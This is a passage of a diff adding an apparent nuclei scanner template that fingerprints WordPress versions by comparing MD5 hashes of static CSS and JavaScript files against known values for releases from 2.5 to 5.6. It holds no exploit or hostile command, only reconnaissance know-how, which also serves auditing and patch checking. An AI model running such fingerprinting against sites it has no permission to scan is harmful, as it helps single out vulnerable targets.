+ dsl: + - "(\"78aa4721fac928e8a2fcd160af422530\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b6efc3a3ec922c77cfc008ad47e116ee\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fa022dfaf91f7cf42fe274cdbe5a7fa2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/themes.min.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ef5290b0b456322ca3ac76b0ab41f054\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"ed740c0a3115880e47cba29134ed6bf8\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"68eb02c6dc043646186b59a360559f0f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"700790d0f345446ccaf08b3460fe8351\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"d5ddd9e2f523fc6d9aa0293c8bd2391d\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"12ea589ec56cee96417b3af756d724b4\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"eef9e9c791a2a8250df76fcbfe5d17bd\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"5bdad071f9e7cfe1a7a92a62d758bbf1\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"71cdb07b51db8a1db6c2d3f08a0367fa\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"fd2b6396366e80b8299b52064d898c0a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"601bb2a5a5eea3590273be36a7df9669\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"a5292a41fb788a8a72e883c4c062beaa\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"582c0c210600f719b442959112412c94\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9dadeed9e3d6c25f0a61f15f5187933a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2eccfd95805b80a6a072a4fff8bfd4b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/themes.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"9a0a057b0459eabbdddead7a1e477eec\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"44bafdf96fbd98c93ca4a6564cbe7e93\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"c1abb7c12d4e54061e011ca25c524ed8\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0528f3a942a205c3b428c17a04b073f8\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"a66b5870f5abf95219e4fde453577ea7\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"a67484679e8fd85db53b9619a2ac8f85\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"faf10f604c6bd3e8e2eb40324b88182e\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ce3f414694b2c845341d2e3d69130267\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"0f2c9837f4d58bec62e54c49bc2b7794\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bf0ab9d631a3b25394db5d04866fc1aa\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"828f5d1cd3443c5976270143e77cadf4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"8658229ae2ce25fd13ff08548675d8ee\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"77beb61918ea32751dac643426d8f3d5\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9071b556370c3845075580318a236b2f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"41554444c0f5476bffaeb6a79961f7ea\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ca0d7958e9d46e58cf9d41f957ec91c8\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c6a5aa2e29f32f44bdce4742fca8f2bb\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"93b7262b1516cf0ec3d539b78c8142e1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b36cac1d32f8b0416c4b6235ac01cd37\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1d76230edc8f2fddd8983c082db89d8b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f82245973ba3fd29d15126f8589f00ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/themes-rtl.min.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"9c4fafeae99d7503e0bee7fb9217c8e9\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"f5a99b541f512e2c0395d7d2b40adb34\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"46c7eef970445884324c035f739ca63a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"dcaa4244b0f2d289a78e99d3b15d0030\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"df4b24fdec390975a02a7603fafc35b9\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"2b3dd6296037fabf5838dbb7abaf097a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"5ff3626ce33e65913c4d8953959aa520\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"5976bde31a300bab3a5d50f41b272b61\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d74ee2f93a19ac860cacb90596dcb490\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cdcc90f54b768a8cd5716b65fff9d435\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"59f537df17030e22fd1e5f56b4d79c84\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"546c91b261d6c87cb01db2444d599cad\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9811db0e32a5b4eec31edd57406b1273\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d855dc46a4c9159753cae0ffd6940c32\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d638ef49ef6db468d4ee59d08c1eaeb9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/themes-rtl.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ac269b6795e49f5954f2ba2acb9794a4\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"8f0a90ccd54ad9f8b584a77ad5fc4df4\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b845e2804487a2c5a4b64938a6c431e1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3b10683d99f04c4d4a33ed92eda6a1de\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"092db96e6dbef112252d3faf4bf955ad\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"9244c8ce5e9d98581459de46b8b1bcd1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"169672ec8c16e26871cd0f2374586204\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"c69c734910d5078b179e84f8bf99e5d6\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ed00d87745e51769e94fb921930d997d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4a121a5c6d72c6506750149b8e20ca56\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"80aac0d388f112376bcdb5bd3539d6e5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6c675d2f6d9a5c8c81a1ad8bb2f3a790\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"400ee8016213e3c3d97bb05fcb49cdb5\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3d6bf238e618acab0ba06717265a5968\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e37a10fd50d81ece6f710c45b3fa1a04\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"032493bd3c26ff357c718c5ee666559e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"fb563bca5ee580768536fd79f2fe0099\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"1c7c4b87a701db41ce0aabd9588d8c17\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"702259ee1857d24d8fd20e3a9f382f4a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"32ff26d078f6a954a639c00b8ca5f603\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ca3bd63183f371d0a5b7d675605b41ce\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d013264ad3f438d142233a254b1117d7\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"66921114b83a2e737e69f2847b4c9cf3\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"790856d6a811fc7fe402923db7b6a5b4\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"325a6c7b04fbd7cf907f383aa5f4de38\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d7a258aa3ccead8b55aab1b671e065e5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e633153dadc9e4941e4f488d3aa837a2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"78ace8b0870478e309e40a7bbf5e3389\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c175f45d5829c12ac0be14efac8bb4c7\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"276f2225f21976d22740e82215494856\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d37ca4ce0e8e1250bb906e69312e665f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"f8ab93f031c0321ede4c47e7c3089da6\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"ebc9181357a52cab8fab57d71c425834\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"11fac912b46d92d88bd5df1878a2c15d\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"937b3ac77d948c34e7dbe07fefdc624d\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"4c1a60281755a58f80a47e0813c41eaa\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"1e90009269f457bd921c66553d228318\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"5d6f193d1f5c5adc2323941754c753bc\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3dbfa38d02be94fdcc892f3a302ac9b9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f4eea5b8a4b0bc5012d0bc602e7ecd13\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0bad85ae8ccab5915c8ec59b6d0e6c90\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"c4faa8b5b7b501ba22c6bb57f156a1c9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b612fa58efa9719e30e8828cf5b7d7cb\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d99ffda66449ebd500441480e4b9a527\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"64c96fc90711e9e0fc3603be28af7127\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/forms-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"47752271f64a9450264075c3388f6c6f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"7ee4c4a582042409d1324354271dd33a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3f3b7c76cbd5221c72b4eee6c87a9308\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8ed5bd4a43ca6575d2df30bb88cffb91\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"61c801bba389554bae370d73246f94fa\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"76fce113f718ef60c9931f72c13d5f9a\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"6a2feae9bdc28933566c060a1f464556\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"d155c4000f10a61e0793569fcb399998\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"331b72eb0cd5c3c8cc46645befabfdd2\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"12f61c063d0234dbafb11a1c59248249\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"f7ac8314d571b1c198d0efff920d2bb2\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"38bd662ed5c53ef1b4be39c239bb3c19\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c7d9a48cde3ec1d9368c4a25b9d9fb5f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"7103b0149a4e22079def0482495cee6e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"872a1bbe2da03464ac6d8ca1c153a3d5\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"af625d635badd366bc7f303a8dd31f8c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e07102630daf98355cb00ed5c073dfa7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a6628e1a25bcafa09aa8b162720ed4b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/forms.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"321a6177a67ded013d09dbf01acfc720\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"ecb1fcf9fd153be961a297b91d5dbfe5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"76ca9c78f6d0c3067f1675647bee0e11\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b6926672577e63afe9b7d0b4aaa4582a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"85423c8fe3301819eb65ce6b293567e7\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"d8c9fc3fe6bcc0d3e421d07de6d0631a\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"7af49f35c490a278b5d68fd14863fc2a\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"fb7105f56049ea9973bd87e921d05aa2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3ca933b7742a2c632bf36dd3b3fda0cd\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"282327fab3ae51f8d9388cd19ffa368f\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"b0d183adf2d3e85eae32e58276125e9d\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"e358104efa34b7f5f6026d9dcaa746ae\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f67578c4abafa31a7df8ab3bb1915f3e\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"a547809c0643c57dc1c8d9250eb8c42e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3c097a0a654b8efcfa9ab5576fdce131\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"2c22663bfcbce25b9621d52d8b86b6cf\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e54ffaded9432c82c95b9a7a41ce2a7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"317de2d6d71ca4bd7be900f1441c205e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/edit-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"c74a0e67bc88bb7a74ca50ccf662d82f\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"a72bd32f3d21c3fcda385af3e8bff5e3\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"500f084226ee39c6b11b9974a65a32f2\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7860eb75440968af1348895c70aa596a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"4830ad6b3e3a4090b20262815591a055\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"e9337ef831e8077f4eccc9db76c0db5d\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"b708d4c4a95584ed6d0fbe99398de717\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"cfba250fba322ce18b32d62855fb192f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"550bf2c8d64a462cd0001b12ab69cef6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"38495c0fe98ea4771bd1ef698c67fe15\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"498eae5afa7050083856a248dcd22d99\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"322756eb9dfcfc64aafea511d272dd1b\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"8d6da8edc4399924c03d3ab0ece8a652\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"033d42e80b0fe67e673bff455ed0843e\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"2458095adb086c724eaa5b71e9b7e6be\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b5c008d615027d62aeaf41a230356c64\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"626baba6145c91db05e9e385fc0d218a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/edit.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1f444df7d07ce6cd93e33b6916ab2bf9\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"36beba49ddd70365704e68b6641cab63\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"8c4b91d038300235db9877d6a4196674\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"32637f3e54e917599672b3c1f00a2a81\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"70c2d4e3ef1aa9773b57a613e0f18688\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"efea55c81e3ea0ca09218e8b5f9afb4c\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"c57388a65dd7ec1756906163092fe189\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"28dd93cd05da310c09f74bc10291e1a4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"19349d4b01b6274f6acfe22728a11ba9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"048e675d19df066b8bbef9e3f47b50b5\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"6ace78179d1df3dc9b65b5184338332c\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"36a7ea65791f3906b1df1a49f5a43d4c\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"13741ff4c641e3802162fa03fbd186a0\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"9bf6983d8457015564b150b4940448d5\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"7774dd0c0ffbbabb3f27bf90b63a20cf\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2d6edb6605a2cb8605fd40f47458410c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"909a82ec9008629769faa54d9e441da9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9ecc681f73ca68d4317b51cda7fcf7a6\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"db1fe8e4e2d28b34933170e7651d9c3e\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"aeab7c0cb90d81f8dde42cf7c0643977\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"071699af2261779b923ed5d35c2906d4\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"2500781d246925eb4f14a6806624b1ba\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"485de2b76d48a457394827f2f5c5e0fb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ab3c6775af462066bdb485407007a49b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e83fa02f4e7f2fad6a2908294ef48346\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"8ba30eea17f8edcad409260ad55cb71e\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2831b769919d5f1425c37982fad9d04a\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"8d63d1b5d33ddb3ce802d4b3101eecb4\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8bd13d2d038f8a9bbae8b5224f7a6cf7\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ffe89d1610b9548b2045b8287efc3a45\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9628e175931f52fa66ba397e185108da\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"9041980e0fcbd9eb534a350ddff07fd9\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"82eda7c0bf831b87fe258f3627733d62\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"0aabf147505c4f70b2118bf9f2cd441e\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"10cabe6e1dae0d377340a3b0f0702730\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"b37189d5961232b0dbe7dfd19b15f961\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"2d8e2c042b6c0ea040fa6442e5d10a14\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"6e250c8c021b3bda740e2abd0728685a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"39011c3ef4e410b2d90154e0f44c6fb2\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"e1b8555dd35d833a4233467e448a83fd\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"1dffc13554c171793366b66ab7abd3a4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d05ceec8b792484151ce78b2728ef8e8\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"e80a8800b4ffda0aa8ba31b72e88d32f\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"8668b09107e802713e02f84e800a37b3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"be60da41523426c0dda3214ea82e2e0d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji-loader.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"3c631f3faee929b38f97cf728a400838\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"c2da74cc961f02f8a1532b9ef4c49f6f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"1e34797cb4169e053e6d526294921d66\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1e775e7c758584bd7af7f718d09eec96\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"2d2731b03615ee79144b9259d94a2e1d\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"4cac17278a207c14a58648c92b24e146\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"bc114c7b2bdddff03241f50f112cec68\" == md5(body))" + - type: dsl + name: 4.4.2 + dsl: + - "(\"59250ea877230734339b12588fb56929\" == md5(body))" + - type: dsl + name: 4.4.1 + dsl: + - "(\"248977111a79cdb3aed53f8262e3c7da\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"355049f99f0565be72e7a2b4dcfd5e5e\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.3.25 + dsl: + - "(\"d4a819f73ff1a4574a969c9e46d6f117\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"91852c46e229354898fcffb83eef84c9\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"961d47e473a86475973713a54741fd33\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"2b204cc941a4670d627f549de9293d29\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"67225f16229b76c9f2a0c46a15182781\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"04696b6a36a295a5deaea186bb9afb6a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"0712b4b1e4761d9b32654d905e41a2e9\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"fe59084e6bc4be1624a6d93df4e63e17\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"90686eda3165dfdae88396b016ff53c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"cabe11a63f5be3fb81358c6680a842ca\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"5986a1680538ac8e83d217027d57543f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"09850183c273d5d1281938b35481e499\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3e0522fdb4c11550a7466636acf5bb89\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"634f61086f99bacf674ec35b13a59d04\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"72708014eb3072db16d015b5cb73b514\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"42a6a3be4f2f11208a281be9be203427\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"18cf2d8b6ef368cc26596b0a630142b5\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"c4661abb4164f292618baa46c3b04235\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"957349ba7cfc37f34ba6754dd351eb1b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"15c63a1f8a16d4ca851ee2f0ef50b976\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"7f8ecaf975c90333afdbfbb467d7117c\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"eb6244e98261b7eca06d8d11cc9f28bf\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"1a0d15022c26abdfdb9448118662a825\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - 